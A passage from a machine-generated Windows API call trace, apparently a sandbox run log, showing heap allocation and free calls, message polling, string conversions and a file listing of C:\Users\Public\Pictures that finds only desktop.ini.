0x2e54e78 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.111] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0269.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51a48 [0269.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51a48, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0269.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e54858 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0269.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0269.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x19) returned 0x2e546c0 [0269.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x2e546c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Pictures", lpUsedDefaultChar=0x0) returned 25 [0269.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x32) returned 0x2e77588 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0269.113] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54788, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x32) returned 0x2e77788 [0269.113] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54788, cbMultiByte=25, lpWideCharStr=0x2e77788, cchWideChar=25 | out: lpWideCharStr="C:\\Users\\Public\\Pictures") returned 25 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0269.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0269.117] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.117] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0269.117] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69a88 [0269.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69a88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0269.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0269.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0269.118] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0269.118] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.119] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa875d0 [0269.119] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0269.119] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.119] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.119] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.120] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.120] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.120] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0269.120] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0269.120] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.121] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.121] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.121] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0269.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0269.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.122] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.122] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.122] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.122] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 